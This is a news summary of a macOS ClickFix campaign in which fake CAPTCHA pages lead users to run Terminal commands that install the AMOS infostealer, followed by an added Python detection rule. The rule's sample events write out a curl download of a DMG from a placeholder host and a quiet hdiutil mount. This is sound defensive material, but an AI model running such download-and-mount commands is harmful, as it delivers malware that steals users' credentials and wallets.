New macOS ClickFix attack silently mounts DMGs to push infostealer

A new macOS ClickFix campaign uses fake CAPTCHA pages and Terminal commands to silently download and launch a malicious DMG that installs Atomic macOS Stealer (AMOS). The malware steals browser credentials, crypto wallet data, Keychain files, messaging app data, and documents, while the campaign uses servers such as svs-verificationdate[.]beer and 196.251.107[.]171.

Key points

  • Attackers use fake CAPTCHA pages to trick Mac users into running malicious Terminal commands.
  • The command quietly downloads a DMG file and mounts it with macOS hdiutil.
  • The payload installs Atomic macOS Stealer, also known as AMOS.
  • AMOS targets browsers, cryptocurrency wallets, Telegram, Discord, Apple Notes, Safari cookies, and Keychain data.
  • Stolen data is packaged into a ZIP archive and uploaded to attacker-controlled servers.
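
As an added example (not from the article or the researchers it cites), one way a defender could flag the chain in the key points above from process-execution telemetry: a download tool writes a DMG and hdiutil then attaches that same file, both under a shell started from Terminal. The event fields, process names, paths, the example URL and the use of hdiutil's -nobrowse/-quiet flags as a "silent mount" signal are assumptions; the sample events are constructed.

```python
import shlex

# Constructed process-execution events, not campaign data. Field names, process
# names, paths and the URL are assumptions made for this example.
EVENTS = [
    {"ts": 100, "pid": 10, "ppid": 1, "image": "Terminal", "cmd": "Terminal"},
    {"ts": 101, "pid": 11, "ppid": 10, "image": "zsh", "cmd": "-zsh"},
    {"ts": 130, "pid": 12, "ppid": 11, "image": "curl",
     "cmd": "curl -fsSL -o /tmp/update.dmg https://download.example.invalid/u.dmg"},
    {"ts": 134, "pid": 13, "ppid": 11, "image": "hdiutil",
     "cmd": "hdiutil attach -nobrowse -quiet /tmp/update.dmg"},
    # Benign: user double-clicks a DMG in Finder.
    {"ts": 500, "pid": 20, "ppid": 1, "image": "Finder", "cmd": "Finder"},
    {"ts": 510, "pid": 21, "ppid": 20, "image": "hdiutil",
     "cmd": "hdiutil attach /Users/a/Downloads/app.dmg"},
]
DOWNLOADERS = {"curl", "wget"}
QUIET_FLAGS = {"-nobrowse", "-quiet"}  # assumed indicators of a hidden mount

def ancestors(pid, by_pid):
    """Yield process images walking up the parent chain (cycle-safe)."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid]["image"]
        pid = by_pid[pid]["ppid"]

def detect(events, window=300):
    """Alert on hdiutil attach of a DMG that a sibling downloader just wrote,
    when both run under a shell descended from Terminal."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        argv = shlex.split(e["cmd"])
        if e["image"] != "hdiutil" or "attach" not in argv:
            continue
        if "Terminal" not in ancestors(e["ppid"], by_pid):
            continue
        dmgs = {a for a in argv if a.lower().endswith(".dmg")}
        for d in events:
            if (d["image"] in DOWNLOADERS and d["ppid"] == e["ppid"]
                    and 0 <= e["ts"] - d["ts"] <= window
                    and dmgs & set(shlex.split(d["cmd"]))):
                alerts.append({"pid": e["pid"], "downloader_pid": d["pid"],
                               "dmg": sorted(dmgs), "quiet": bool(QUIET_FLAGS & set(argv))})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The rule only matches when the download and the mount are separate child processes of the same shell; telemetry that records a single combined command line would need the same path match applied within that one string.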

Read More: https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/